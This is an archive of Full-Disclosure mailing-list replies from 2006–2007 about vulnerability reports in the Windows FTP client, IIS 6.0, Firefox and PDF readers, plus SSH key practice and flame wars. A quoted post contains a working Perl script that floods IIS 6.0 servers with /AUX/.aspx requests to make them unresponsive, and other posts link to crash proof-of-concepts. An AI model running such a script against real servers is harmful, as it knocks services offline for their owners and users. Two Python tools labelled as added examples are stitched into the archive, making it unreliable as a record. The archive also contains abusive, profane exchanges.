Re: [Full-disclosure] Microsoft FTP Client Multiple Bufferoverflow Vulnerability

2007-11-28 Thread Stan Bubrouski
Not to mention the obvious fact that if you have to trick someone into
running a batch file then you could probably just tell the genius to
execute a special EXE you crafted for them.

-sb

On Nov 28, 2007 4:43 PM, dev code [EMAIL PROTECTED] wrote:

  lolerowned, kinda like the 20 other non exploitable stack overflow
 exceptions that someone else has been reporting on full disclosure
 
 Date: Wed, 28 Nov 2007 09:11:30 -0600
 From: [EMAIL PROTECTED]
 To: [EMAIL PROTECTED]; full-disclosure@lists.grok.org.uk
 Subject: Re: [Full-disclosure] Microsoft FTP Client Multiple Bufferoverflow
 Vulnerability



 so... what fuzzer that you didn't code did you use to find these amazing
 vulns?

 Also nice 'payload'  in your exploits meaning 'nice long lists of as'. You
 should not claim code execution when your code does not perform it.

 Well I guess it has been good talking until your fuzzer crashes another
 application and you copy and paste the results


 On 11/28/07, Rajesh Sethumadhavan [EMAIL PROTECTED] wrote:
 Microsoft FTP Client Multiple Bufferoverflow
 Vulnerability

 #

 XDisclose Advisory       : XD100096
 Vulnerability Discovered : November 20th 2007
 Advisory Reported        : November 28th 2007
 Credit                   : Rajesh Sethumadhavan

 Class                    : Buffer Overflow
                            Denial Of Service
 Solution Status          : Unpatched
 Vendor                   : Microsoft Corporation
 Affected applications    : Microsoft FTP Client
 Affected Platform        : Windows 2000 server
                            Windows 2000 Professional
                            Windows XP
                            (Other versions may also be affected)

 #


 Overview:
 Bufferoverflow vulnerability is discovered in
 microsoft ftp client. Attackers can crash the ftp
 client of the victim user by tricking the user.


 Description:
 A remote attacker can craft a packet with a payload in the
 mget, ls, dir, username and password
 commands as demonstrated below. When the victim executes the
 POC or specially crafted packets, the ftp client will
 crash, with possible arbitrary code execution in the context of
 the logged in user. This vulnerability is hard to exploit
 since it requires social engineering and shellcode has
 to be injected as an argument in the vulnerable commands.

 The vulnerability is caused due to an error in the
 Windows FTP client in validating commands like mget,
 dir, user, password and ls

 Exploitation method:

 Method 1:
 -Send POC with payload to user.
 -Social engineer victim to open it.

 Method 2:
 -Attacker creates a directory with long folder or
 filename in his FTP server (should be other than IIS
 server)
 -Persuade victim to run the command mget, ls or
 dir  on specially crafted folder using microsoft ftp
 client
 -FTP client will crash and payload will get executed


 Proof Of Concept:
 http://www.xdisclose.com/poc/mget.bat.txt
  http://www.xdisclose.com/poc/username.bat.txt
 http://www.xdisclose.com/poc/directory.bat.txt
 http://www.xdisclose.com/poc/list.bat.txt

 Note: Modify POC to connect to lab FTP Server
  (As of now it will connect to
 ftp://xdisclose.com)

 Demonstration:
 Note: Demonstration leads to crashing of Microsoft FTP
 Client

 Download the POC, rename it to a .bat file and execute any one of
 the batch files
 http://www.xdisclose.com/poc/mget.bat.txt
  http://www.xdisclose.com/poc/username.bat.txt
 http://www.xdisclose.com/poc/directory.bat.txt
 http://www.xdisclose.com/poc/list.bat.txt


 Solution:
 No Solution

 Screenshot:
 http://www.xdisclose.com/images/msftpbof.jpg


 Impact:
 Successful exploitation may allow execution of
 arbitrary code with privilege of currently logged in
 user.

 Impact of the vulnerability is system level.


 Original Advisory:
 http://www.xdisclose.com/advisory/XD100096.html

 Credits:
 Rajesh Sethumadhavan has been credited with the
 discovery of this vulnerability


 Disclaimer:
 This entire document is strictly for educational,
 testing and demonstrating purpose only. Modification
 use and/or publishing this information is entirely on
 your own risk. The exploit code/Proof Of Concept is to
 be used on test environment only. I am not liable for
 any direct or indirect damages caused as a result of
 using the information or demonstrations provided in
 any part of this advisory.




 

 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/


 

Re: [Full-disclosure] Question Regarding IIS 6.0 / Is this a DoS???

2007-05-22 Thread Stan Bubrouski
What version of the .NET framework is running on the server? 1.1.x,
2.0.x, or 3.0.x?

-sb

On 5/22/07, kingcope [EMAIL PROTECTED] wrote:
 Hello List,

 Recently I saw a small bug in IIS 6.0 when requesting a special path.
 When I request /AUX/.aspx the server takes a bit longer to respond than
 normally. So I did write an automated script to see what happens if
 I request this file several times at once. The result is that some servers
 on the internet get quite unstable, some do not. On some servers after I
 stop the attack I get an exception that the Server is too busy/Unhandled
 Exception on the wwwroot (/) path.
 Can you/the list confirm that?

 Here is a lame testing script for this stuff:





 #When sending multiple parallel GET requests to a IIS 6.0 server requesting
 #/AUX/.aspx the server gets instable and non responsive. This happens only
 #to servers which respond a runtime error (System.Web.HttpException)
 #and take two or more seconds to respond to the /AUX/.aspx GET request.
 #
 #
 #signed,
 #Kingcope [EMAIL PROTECTED]
 ##
 ###***
 ###
 ###
 ###
 ### Lame Internet Information Server 6.0 Denial Of Service (nonpermanent)
 ### by Kingcope, May/2007
 ### Better run this from a Linux system
 ##

 use IO::Socket;
 use threads;

 if ($ARGV[0] eq ) { exit; }
 my $host = $ARGV[0];

 $|=1;

 sub sendit {
 $sock = IO::Socket::INET-new(PeerAddr = $host,
   PeerPort = 'http(80)',
   Proto= 'tcp');

 print $sock GET /AUX/.aspx HTTP/1.1\r\nHost:
 $host\r\nConnection:close\r\n\r\n;
 }

 $sock = IO::Socket::INET-new(PeerAddr = $host,
   PeerPort = 'http(80)',
   Proto= 'tcp');

 print $sock GET /AUX/.aspx HTTP/1.1\r\nHost:
 $host\r\nConnection:close\r\n\r\n;

 $k=0;
 while ($sock) {
 if (($_ =~ /Runtime\sError/) || ($_ =~ /HttpException/)) {
 $k=1;
 last;
 }
 }

 if ($k==0) {
 print Server does not seem vulnerable to this attack.\n;
 exit;
 }

 print ATTACK!\n;

 while(1){

 for (my $i=0;$i=100;$i++) {
 $thr = threads-new(\sendit);
 print \r\r\r$i/100;
 }

 foreach $thr (threads-list) {
 $thr-join;
 }
 }


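A log-side check for the behaviour reported in this thread, as an added example that is not part of the original messages: it scans IIS W3C extended log lines for bursts of requests whose path contains a reserved DOS device name (such as /AUX/.aspx) and counts how many of them took two seconds or longer. The log lines, addresses, threshold and window are constructed assumptions.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta
from urllib.parse import unquote

# Reserved DOS device names; a path segment resolving to one of these is
# never a legitimate file on a Windows web root.
RESERVED = ({"CON", "PRN", "AUX", "NUL"}
            | {f"COM{i}" for i in range(1, 10)}
            | {f"LPT{i}" for i in range(1, 10)})


def is_device_path(uri_stem):
    """True if any path segment names a reserved device (AUX, aux.txt, ...)."""
    for segment in unquote(uri_stem).split("/"):
        base = segment.split(".", 1)[0].rstrip(" :").upper()
        if base in RESERVED:
            return True
    return False


def parse_w3c(lines):
    """Yield one dict per request, keyed by the names in the #Fields directive."""
    fields = []
    for line in lines:
        line = line.strip()
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            values = line.split()
            if len(values) == len(fields):
                yield dict(zip(fields, values))


def find_bursts(records, threshold=5, window=timedelta(seconds=10), slow_ms=2000):
    """Return {client_ip: (peak requests in window, slow responses)} for
    clients that sent at least `threshold` device-path requests in `window`."""
    recent = defaultdict(deque)
    peak = {}
    slow = defaultdict(int)
    for rec in records:
        if not is_device_path(rec["cs-uri-stem"]):
            continue
        ip = rec["c-ip"]
        ts = datetime.strptime(rec["date"] + " " + rec["time"], "%Y-%m-%d %H:%M:%S")
        if int(rec["time-taken"]) >= slow_ms:   # time-taken is in milliseconds
            slow[ip] += 1
        q = recent[ip]
        q.append(ts)
        while ts - q[0] > window:                # drop requests outside the window
            q.popleft()
        if len(q) >= threshold:
            peak[ip] = max(peak.get(ip, 0), len(q))
    return {ip: (peak[ip], slow[ip]) for ip in peak}


# Constructed sample log: one client bursts /AUX/.aspx, one browses a
# harmless look-alike path, one sends a single stray request.
SAMPLE_LOG = (
    ["#Software: Microsoft Internet Information Services 6.0",
     "#Fields: date time c-ip cs-method cs-uri-stem sc-status time-taken",
     "2007-05-22 10:00:01 192.0.2.10 GET /default.aspx 200 15"]
    + [f"2007-05-22 10:00:{2 + i // 3:02d} 198.51.100.7 GET /AUX/.aspx 500 {2000 + 150 * i}"
       for i in range(8)]
    + [f"2007-05-22 10:00:{5 + i:02d} 203.0.113.5 GET /auxiliary/list.aspx 200 20"
       for i in range(6)]
    + ["2007-05-22 10:00:30 192.0.2.10 GET /aux/.aspx 500 2300"]
)

if __name__ == "__main__":
    for ip, (count, slow_count) in find_bursts(parse_w3c(SAMPLE_LOG)).items():
        print(f"{ip}: {count} device-path requests in window, {slow_count} slow")
```
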


Re: [Full-disclosure] Firefox 2.0.0.3 Out-of-bounds memory access via specially crafted html file

2007-05-01 Thread Stan Bubrouski
On FF 2.0.0.3 on WinXP SP2+hotfixes clicking the link loads up the
server not found page then CPU shoots up to 100% for ~1 minute and
then everything goes back to normal... not too exciting...

-sb

On 5/1/07, carl hardwick [EMAIL PROTECTED] wrote:
 Product: Firefox 2.0.0.3
 Description: Out-of-bounds memory access via specially crafted html file
 Type: Remote

 Vulnerability can be exploited by using a large value in a href tag to
 create an out-of-bounds memory access.

 Proof Of Concept exploit:
 http://www.critical.lt/research/opera_die_happy.html



Re: [Full-disclosure] Firefox onUnload + document.write() memory corruption vulnerability (MSIE7 null ptr)

2007-02-25 Thread Stan Bubrouski
On 2/25/07, Daniel Veditz [EMAIL PROTECTED] wrote:
 Michal Zalewski wrote:
  A quick test case that crashes while trying to follow partly
  user-dependent corrupted pointers near valid memory regions (can be forced
  to write, too):
 
http://lcamtuf.coredump.cx/ietrap/testme.html
 
  Firefox problem is being tracked here:
https://bugzilla.mozilla.org/show_bug.cgi?id=371321

 This bug was fixed in 2.0.0.2, released Friday Feb 23.

No it most certainly wasn't, do your homework next time.

-sb



Re: [Full-disclosure] Firefox onUnload + document.write() memory corruption vulnerability (MSIE7 null ptr)

2007-02-25 Thread Stan Bubrouski
The test on that page still puts my 2.0.0.2 in a completely unusable
state, try it yourself and let me know what happens.

-sb

On 2/25/07, Ismail Dönmez [EMAIL PROTECTED] wrote:
 On Sunday 25 February 2007 18:57:47 Stan Bubrouski wrote:
  On 2/25/07, Daniel Veditz [EMAIL PROTECTED] wrote:
   Michal Zalewski wrote:
A quick test case that crashes while trying to follow partly
user-dependent corrupted pointers near valid memory regions (can be
forced to write, too):
   
  http://lcamtuf.coredump.cx/ietrap/testme.html
   
Firefox problem is being tracked here:
  https://bugzilla.mozilla.org/show_bug.cgi?id=371321
  
   This bug was fixed in 2.0.0.2, released Friday Feb 23.
 
  No it most certainly wasn't, do your homework next time.

 Well surely someone didn't do his homework but it's not Daniel, see
 https://bugzilla.mozilla.org/show_bug.cgi?id=371321 .


 --
 Ismail Donmez ismail (at) pardus.org.tr
 GPG Fingerprint: 7ACD 5836 7827 5598 D721 DF0D 1A9D 257A 5B88 F54C
 Pardus Linux / KDE developer




Re: [Full-disclosure] Firefox onUnload + document.write() memory corruption vulnerability (MSIE7 null ptr)

2007-02-25 Thread Stan Bubrouski
I can't say the same it shoots my CPU up to 100% and is completely
unresponsive on win2k sp4.

On 2/25/07, Ismail Dönmez [EMAIL PROTECTED] wrote:
 On Sunday 25 February 2007 20:27:19 Stan Bubrouski wrote:
  The test on that page still puts my 2.0.0.2 in a completely unusable
  state, try it yourself and let me know what happens.

 Doesn't crash here on Linux, I just see http://slashdot.org in URL bar and
 empty page below, so I can confirm 2.0.0.2 fixed the issue.

 --
 Ismail Donmez ismail (at) pardus.org.tr
 GPG Fingerprint: 7ACD 5836 7827 5598 D721 DF0D 1A9D 257A 5B88 F54C
 Pardus Linux / KDE developer




Re: [Full-disclosure] Firefox: serious cookie stealing / same-domain bypass vulnerability

2007-02-15 Thread Stan Bubrouski
On 2/15/07, Michal Zalewski [EMAIL PROTECTED] wrote:
 Actually, there are several odd problems related to location updates and
 location.hostname specifically, including one scenario that apparently
 makes the script run with document.location in about: namespace.

 I did not research them any further, so I can't say if they're
 exploitable - but you can see a demo here, feel free to poke around:

   http://lcamtuf.coredump.cx/fftests.html


I tried these and all worked as advertised except the last one which
shot the browser to 100% CPU but was recoverable when I closed the tab
after a few seconds.

-sb


 Cheers,
 /mz
 http://lcamtuf.coredump.cx/



Re: [Full-disclosure] [Full-Disclosure] (Psexec on *NIX)

2007-02-02 Thread Stan Bubrouski
On 2/2/07, Tyop? [EMAIL PROTECTED] wrote:

 key-based login without passphrase is like eating cheese without
 bread. useless (IMHO).


Totally, if someone compromises the machine and gets root they get all
your keys and without a passphrase... yeah no good.

  - With a little bit of configuration, it's easy to figure out which
  key was used to login to an account; the audit trail can be managed
  that way.
  - Managing which users have access to which root accounts is trivial
  this way: just add or delete their keys from .ssh/authorized_keys[2].

 Totally agree.


Ditto.

-sb

 --
 Tyop?
 http://altmylife.blogspot.com

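The audit-trail point quoted in this thread (working out which key was used to log in to a shared account), as an added example that is not part of the original messages: it matches the key fingerprint in sshd "Accepted publickey" log lines against the entries of an authorized_keys file and reports logins made with a key that is not in the file. It assumes the log format of current OpenSSH releases; the key material, comments and log lines are constructed.

```python
import base64
import hashlib
import re

# key type, base64 blob, optional comment; options may precede the key type.
KEY_RE = re.compile(
    r"(?:^|\s)((?:ssh|ecdsa|sk)-[A-Za-z0-9@.-]+)\s+([A-Za-z0-9+/]+=*)(?:\s+(.*))?$"
)
LOGIN_RE = re.compile(
    r"Accepted publickey for (\S+) from (\S+) port \d+ ssh2: \S+ (SHA256:\S+)"
)


def fingerprint(b64_blob):
    """OpenSSH-style fingerprint: base64(sha256(key blob)) without '=' padding."""
    digest = hashlib.sha256(base64.b64decode(b64_blob)).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")


def load_authorized_keys(text):
    """Map fingerprint -> comment for every valid key line."""
    owners = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        m = KEY_RE.search(line)
        if not m:
            continue
        ktype, blob64, comment = m.groups()
        try:
            blob = base64.b64decode(blob64, validate=True)
        except ValueError:
            continue
        # A key blob starts with its own length-prefixed type name; this
        # rejects option text that merely looks like a key.
        n = int.from_bytes(blob[:4], "big")
        if blob[4:4 + n] != ktype.encode():
            continue
        owners[fingerprint(blob64)] = comment or "(no comment)"
    return owners


def audit_logins(log_lines, owners):
    """Return (account, source address, key owner) for each public-key login."""
    events = []
    for line in log_lines:
        m = LOGIN_RE.search(line)
        if m:
            user, source, fp = m.groups()
            events.append((user, source, owners.get(fp, "UNKNOWN KEY")))
    return events


def constructed_key(ktype, seed):
    """Build a stand-in key blob for the sample data (not a usable key)."""
    blob = len(ktype).to_bytes(4, "big") + ktype.encode() + hashlib.sha256(seed).digest()
    return base64.b64encode(blob).decode()


ALICE = constructed_key("ssh-ed25519", b"alice")
BOB = constructed_key("ssh-ed25519", b"bob")
REMOVED = constructed_key("ssh-ed25519", b"key no longer in the file")

# Constructed authorized_keys for a shared root account.
SAMPLE_AUTHORIZED_KEYS = f"""# /root/.ssh/authorized_keys (constructed)
ssh-ed25519 {ALICE} alice@laptop
from="192.0.2.0/24",command="run ssh-backup" ssh-ed25519 {BOB} bob@backup-host
"""

# Constructed auth log lines.
SAMPLE_LOG = [
    f"Feb  2 09:14:07 gw sshd[2211]: Accepted publickey for root from 192.0.2.15 "
    f"port 50122 ssh2: ED25519 {fingerprint(ALICE)}",
    "Feb  2 09:20:41 gw sshd[2290]: Failed password for invalid user admin "
    "from 203.0.113.9 port 40022 ssh2",
    f"Feb  2 09:31:55 gw sshd[2342]: Accepted publickey for root from 192.0.2.77 "
    f"port 50310 ssh2: ED25519 {fingerprint(BOB)}",
    f"Feb  2 09:47:12 gw sshd[2401]: Accepted publickey for root from 198.51.100.23 "
    f"port 41877 ssh2: ED25519 {fingerprint(REMOVED)}",
]

if __name__ == "__main__":
    owners = load_authorized_keys(SAMPLE_AUTHORIZED_KEYS)
    for user, source, owner in audit_logins(SAMPLE_LOG, owners):
        print(f"{user} from {source}: {owner}")
```
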


Re: [Full-disclosure] iDefense Q-1 2007 Challenge -I WILL BUY FOR MORE

2007-01-18 Thread Stan Bubrouski
Stick to beer, hard liquor seems to make you an angry drunk.

-sb

On 1/19/07, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote:
 Of course you will, the company you sell to never found more
 than 4 vulns in their existence.

 You're the cheap sales man selling insurance, where's your
 USD750.ooo vuln EXPERT VULN GUY ?

 No where, and neither the shithole company, which is yours, ever
 passed even 1 UsD through your company if you can even call it that;


 RE-REQUEST. YOUR LAWYER NOTIFICATION ON HIS HEADED NOTE PAPER YOU
 SUCCESSFULLY TRANSACTED EVEN ONE DEAL IN THIS FRAME,

 RE-RE-REQUEST YOUR LAWYER OR ACCOUNTING THAT EVEN YOU OR YOUR ROXY
 COMPANY R THE COMPANY BEHIND IT EVEN HAS THE MEANS TO DELIVER
 USD750.OOO AT ALL PER YOUR CLAIM AND PROMISE AS WRITTEN BY YOU ON FD
 STATING SO.

 YOUR FAILURE TO DO SO OR PROOF EITHER OR, WILL NULL AND VOID YOU
 AND RECONFIRM YOU AND YOUR '[AFFILIATES]' ARE FRAUDS


 On Fri, 19 Jan 2007 01:52:06 -0500 Simon Smith [EMAIL PROTECTED]
 wrote:
 You're right... I'll start ignoring you now. ;)
 
 
 On 1/19/07 1:50 AM, [EMAIL PROTECTED]
 [EMAIL PROTECTED]
 wrote:
 
  typical con artist - wrong focus FUCKFACE
 
  PROOF YOUR BONA FIDES VIA .LAWYER OR .ACCOUNTANT. EVEN ONE NICKEL
  GIVEN FOR A VULN. LET ALONE 750 MILLION.
 
  On Fri, 19 Jan 2007 01:42:43 -0500 Simon Smith
 [EMAIL PROTECTED]
  wrote:
  Dumbass, you must be a part of the n3td3v ccr3w or something.
 
  How did you go from 75,000 to 750,000?
 
 
  On 1/19/07 1:38 AM, [EMAIL PROTECTED]
  [EMAIL PROTECTED]
  wrote:
 
  Number one:
 
  1. An affidavit from your solicitors or accountants that
  USD750.000 has ever been dispensed through your company or
  your proxy company
 
  2. An affidavit from your solicitors or accountants, that
  you, your so-called client (who is you sno shit) have ever paid
  out up to 750.ooo usd {citing in some cases}
 
  PUT UP SHUT UP OR FUCK OFF. YOU COULDN'T FIND A VULN IF YOU
  TRIED.
 
  PROOF EVERY ONE WRONG LOUD MOUTH.
 
  On Fri, 19 Jan 2007 01:31:51 -0500 Simon Smith
  [EMAIL PROTECTED]
  wrote:
  Dear NoBalls,
 What specifically is a fuckface anyway and why are you
  hiding behind
  an anonymous email account?
 
  More importantly, my words were not:
 
  SAME TARGETS: ie7 VISTA 8k, I know someone who will pay much
  for
  up
  to 75 for the same.
 
  Hell that sentence doesn't even make any sense! What the heck
  does
 
  much for
  up to 75 for the same even mean?
 
  My EXACT words were:
 
  Amen!
 KF is 100% on the money. I can arrange the legitimate
  purchase
 
  of most
  working exploits for significantly more money than iDefense,
 In
  some cases
  over $75,000.00 per purchase. The company that I am working
  with
  has a
  relationship with a legitimate buyer, all transactions are
  legal.
  If you're
  interested contact me and we'll get the ball rolling.
 
  -Simon
 
 
 $8000.00 USD is low!
 
  -End of my words-
 
  ;]
 
 
 
  On 1/19/07 1:05 AM, [EMAIL PROTECTED]
  [EMAIL PROTECTED]
  wrote:
 
  SAME TARGETS: ie7 VISTA 8k, I know someone who will pay much
  for
 
  up
  to 75 for the same. YOUR WORDS FUCKFACE
 
  ST00PID LYING CUNT!
 
  I can arrange the legitimate purchase of most
  working exploits for significantly more money than iDefense,
  In
  some cases
  over $75,000.00 per purchase.
 
  
  Re: [Full-disclosure] iDefense Q-1 2007 Challenge
 
  From: Simon Smith (simonsnosoft.com)
  Date: Tue Jan 16 2007 - 11:14:56 CST
  know someone who will pay significantly more per
 vulnerability
  against the
  same targets.
 
 
 
  On 1/10/07 12:27 PM, contributor Contributoridefense.com
  wrote:
 
 
 
  -BEGIN PGP SIGNED MESSAGE-
  Hash: SHA1
 
  Also available at:

  http://labs.idefense.com/vcp/challenge.php#more_q1+2007%3A+vulnerability+challenge
 
 
  *Challenge Focus: Remote Arbitrary Code Execution
  Vulnerabilities
  in
  Vista  IE 7.0*
 
  
 
  On Fri, 19 Jan 2007 00:43:50 -0500 Simon Smith
  [EMAIL PROTECTED]
  wrote:
  Nobody ever said that 75,000.00 was a price for a remote
  vista
  bug.
 
 
  On 1/18/07 8:39 PM, [EMAIL PROTECTED]
  [EMAIL PROTECTED]
  wrote:
 
  This is complete bullshit nothing more than a social engineering
  honey pot to get bugs and vulns for their own use, this company
  couldn't afford 75.ooo USD if they tried, they cannot even find
  their own bugs, they got 4 or 5 shitty research and vuln
  findings of their own, that's it.
 
  75.000 for a remote vista ie7 xploit, guaranteed you wont
  find
  it
  and if you do they won't pay
 
  lose lose :(
 
  jigga
 
  yo
 
 
 
 
 
 

Re: [Full-disclosure] Google's blacklisted url database (phishing url database)

2007-01-03 Thread Stan Bubrouski
You're forgetting that gmail has a feature to report phishing
messages, that alone could give google quite a list of phishing sites
given its userbase.

-sb

On 1/2/07, moniker monikerd [EMAIL PROTECTED] wrote:

 i see only two possible ways for google to get this kind of data.

 google toolbar
 or it buys/gets this information from some isp/companies/anybody with a big
 enough pipe ..





 
 
  On 1/2/07, php0t [EMAIL PROTECTED] wrote:
  
 How exactly does such data get captured? Somebody placed a link
   somewhere with the url having the user/password in it ? What would be
   the point of that? And if not, where did that come from? I peeked at
  
 http://www.google.com/tools/firefox/safebrowsing/faq.html
 to learn more
   but it only has obvious info.
  
  
  
   -Original Message-
   From: [EMAIL PROTECTED]
   [mailto:[EMAIL PROTECTED] On
 Behalf Of JM
   Sent: Tuesday, January 02, 2007 11:17 PM
   To: full-disclosure@lists.grok.org.uk
   Subject: Re: [Full-disclosure]Google's blacklisted url database
   (phishing url database)
  
  
  
   I just played around a bit with those lists and as it seems, Google did
   a splendid job, even capturing some people's login data. Like here:
  
 http://sb.google.com/safebrowsing/update?version=goog-black-url:1:7753
  
   Regards,
   J.M.
   Professional Lurker
  
   [By] Rajesh Sethumadhavan  [EMAIL PROTECTED]
   [Date]  Dienstag, 2. Januar 2007 18:42
   [To]  full-disclosure@lists.grok.org.uk
   [Subject] [Full-disclosure] Google's blacklisted url database (phishing
   url
   database)
   
It is possible to access google`s blacklisted url database ( phishing
url database )
   
   
 http://sb.google.com/safebrowsing/update?version=goog-black-url:1:1
   
 http://sb.google.com/safebrowsing/update?version=goog-black-url:1:7998
   
   
 http://sb.google.com/safebrowsing/update?version=goog-white-domain:1:19
   ,goo
  
 g-white-url:1:371,goog-black-url:1:7693,goog-black-enchash:1:15282
   
   
This database (Part of Google Safe Browsing) can be used in any
anti-phishing commercial softwares :)
   
Regards
Rajesh Sethumadhavan
http://www.xdisclose.com
  


Re: [Full-disclosure] Backdooring PDF Files

2006-09-14 Thread Stan Bubrouski
On 9/14/06, Hugo Francisco González Robledo [EMAIL PROTECTED] wrote:
 I think it depends on the context.

 Example 1 (backdoored1.pdf) :

 On Ubuntu Linux with Adobe Reader 7.0.1 opens the web page on
 mozilla-firefox without warning.


On FC5 with Acrobat Reader 7.0.8 it opens the page in firefox without
warning as well.

-sb



Re: [Full-disclosure] Gmail emails issue

2006-08-04 Thread Stan Bubrouski

I'm reading your message in gmail and there is nothing in my temp
folder... not that I'd expect there to be.  Gmail can't just create
files on your computer without your permission, if it can your
settings are wrong or your browser is broken.  In other words if your
gmail mails are ending up in your temp folder your web browser is
putting them there...  what browser are you using BTW.  I'm using
firefox and it doesn't store my mails in the temp folder under my NT
account.

-sb

On 8/4/06, 6ackpace [EMAIL PROTECTED] wrote:


Hi All,

Gmail stores mails in Temp folder for faster access, but I have observed it
fails to remove mail from the temp files after the session is ended.

Any user who has physical access to the system can read mail and
contact information of the Gmail user.

Discloses information which is private and confidential?

thank you

ratna



Re: [Full-disclosure] Hushmail addresses are being used to impersonate n3td3v

2006-07-31 Thread Stan Bubrouski

On 7/31/06, n3td3v [EMAIL PROTECTED] wrote:

Hi,

You cannot impersonate someone, even n3td3v, it's against the law.
I've already sent abuse reports to Hushmail at the time of writing this e-mail.
If you continue to make fun of n3td3v, i'll report the new addresses as well.

n3td3v


Last time I checked it is not illegal to register the name
[EMAIL PROTECTED] or [EMAIL PROTECTED], etc... nor is it illegal to
use the accounts.  I think you are confusing forging e-mail headers
with people mocking your complete and utter stupidity.

-sb



Re: [Full-disclosure] Hushmail addresses are being used to impersonate n3td3v

2006-07-31 Thread Stan Bubrouski

On 7/31/06, n3td3v v3dt3n [EMAIL PROTECTED] wrote:


That goes for you too mister. Stop impersonating me or i will tell your mom,
I am the real n3td3v  as i  own n3td3v.com   So there you little twerp.



I've never bothered to impersonate you, but again ownership of
n3td3v.com doesn't give you exclusive use of the name in the US or any
other country I know of for that matter.  Personally I find your
impersonators much more affable.

-sb



Re: [Full-disclosure] Microsoft DNS resolver: deliberately sabotaged hosts-file lookup

2006-04-13 Thread Stan Bubrouski
On 4/13/06, Brandon S. Allbery KF8NH [EMAIL PROTECTED] wrote:

 On Apr 13, 2006, at 1:29 , Dave Korn wrote:

Hey, guess what I just found out:  Microsoft have deliberately
  sabotaged
  their DNS client's hosts table lookup functionality.

 I thought this was part of avoiding malware attempts to block Windows
 Update.

How bypassing blocking of go.microsoft.com affects windowsupdate I
don't know.  Been a while since I looked at windows update at all, but
doesn't it download files from mirrors anyways?  And even if it didn't
are the files actually downloaded from go.microsoft.com?  Either way
it appears Dave is right, which makes me wonder if there isn't another
greater purpose aside from WMP updates.  Like assured tracking of
users for other nefarious and monopolistic purposes.

Best Regards,
sb



 --
 brandon s. allbery [linux,solaris,freebsd,perl]
 [EMAIL PROTECTED]
 system administrator  [openafs,heimdal,too many hats]
 [EMAIL PROTECTED]
 electrical and computer engineering, carnegie mellon university
 KF8NH





Re: [Full-disclosure] (no subject)

2006-03-30 Thread Stan Bubrouski
Name one powerful hacker kicked out of here?  Just one.  And you don't
count (neither do I but I've never claimed to be an expert or
important).

-sb

On 3/30/06, n3td3v [EMAIL PROTECTED] wrote:
 The most powerful hackers in the world being told to get off fd, well that
 says a lot for fd then doesn't it. I'll be off and leave you skids to it. I
 don't want to hold up your list of free vulnerabilities and exploits which
 you stalk this list for, because none of you can find your own
 vulnerabilities to hack the planet with, bye.


 On 3/30/06, s89df987 s9f87s987f [EMAIL PROTECTED] wrote:
  n3td3v be gone like you said you would.
 
  and Kevin Mitnick is just a flashy name used to get ppl to buy
 
  On 3/30/06, n3td3v [EMAIL PROTECTED] wrote:
  
  Nah dude, he stood in defence of Kevin Mitnick, works with the UN,
  whitehouse, fbi etc. He's a world leading advisor with much influence on
  the super powers of the world in relation to information technology security.
  
 http://www.nytimes.com/2005/07/31/business/yourmoney/31hack.html?ex=1280462400en=311d897de4ab090aei=5088partner=rssnytemc=rss
 http://www.msbit.com/mis.html
  http://www.cutter.com/consultants/seidenm.html   He's
 highly respected in
  the government and corporate circuits of the world.
  Everytime I speak to him he's in another part of the world preparing to
 go
  into talks with a government or corporation. By no means a script kid who
  got lucky. He and people as high up as him are the real people who run
 U-S
  government and corporate interests. We all know when we think of George W
  Bush, we all know he's not that powerful and takes advice from the real
  advisors in control of the world, that you never see or hear about in
  public, well Seiden is your man.
  
 On 3/30/06, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote: 
  On Wed, 29 Mar 2006 23:36:28 +0100, n3td3v said:
 You mean like Seiden who broke into banks and told everyone about
 it,
  and is   now one of the biggest security experts in the industry. He
 sent
  me an
 e-mail telling me a week or so back telling me to take you
 seriously,
  i'm
 beginning to wonder why.
 On Wed, 29 Mar 2006 23:56:48 +0100, n3td3v said:   thats the
 current
  situation, upto date. Seiden at yahoo (security
 consultant/advisor/hacker) whatever you want to call him is now
 pissed
  off
 because he's getting no info feed into his corporate security team 
 
  anymore...
 You'd think if Seiden was leet enough to break into banks, he'd be
  able to
apply the same techniques to Yahoo and not need an external feed.
  Unless
  of
course he was just a skiddy who whacked the banks with some exploit he
  stole  from somebody else and didn't understand
  
  


Re: [Full-disclosure] Noise

2006-03-29 Thread Stan Bubrouski
So let me see if I get this right, yahoo employees are trying to tap
you for information and you stopped contacting them.  Plenty of people
on this list want nothing of you and would love for you to stop
contacting them.  How can we pull a yahoo here and be rid of you?

-sb

On 3/29/06, n3td3v [EMAIL PROTECTED] wrote:

 I finished school 11 years ago, in fact I left on my own accordance (when I
 was 14) because they were going to chuck me out of school anyway. I soon got
 involved in stealing cars, breaking into houses, and taking goods from
 shops. All my criminal friends went to jail, I was the only one left. I
 started using computers to pass the time (when I was 18) when having no one
 left to hang about with, and I used my knowledge of criminality to work out
 the bad guys at Yahoo. I then met an employee (who will remain unnamed) to
 act as an informant for Yahoo. I then started to find my own vulnerabilities
 to Yahoo, which I reported to them. They started disrespecting me,  I setup
 my own security group to show them that I could be a match against them and
 continue to compromise their systems. I then went on a public crusade to
 tell the public all about their flaws that I had been keeping secret for
 years. Their employees who thought were befriending me to keep in tap with
 info I had were told finally to f*** off just last week, and now there is no
 connection between n3td3v and the yahoo security team, in fact, I mailed the
 official address and told them I wouldn't be mailing them ever again. And
 that's the current situation, up to date. Seiden at yahoo (security
 consultant/advisor/hacker) whatever you want to call him is now pissed off
 because he's getting no info feed into his corporate security team
 anymore... and the consultants and engineers who had opened dialog with me
 are now sitting in paranoia.



 On 3/29/06, xyberpix [EMAIL PROTECTED] wrote:
  -BEGIN PGP SIGNED MESSAGE-
  Hash: SHA1
 
  Yeah, I do actually, but due to the nature of the company that I work
  for, I'm not actually able to disclose any of that information.
  I'm also legally not allowed to disclose any vulnerabilities
  publicly, as per my contract of employment.
  Most the people on this list and a few others are already aware of
  those factors, but I guess I couldn't expect someone of your l33tness
  to comprehend that.
  Maybe one day when you get a real job, and finish school, and if
  you're lucky enough, your prospective employer will have no idea who
  n3td3v is. You may even understand that certain
  factors change when you get a real job, I just hope that for your
  sake one day you realize the damage that you are doing to your name
  in the industry.
 
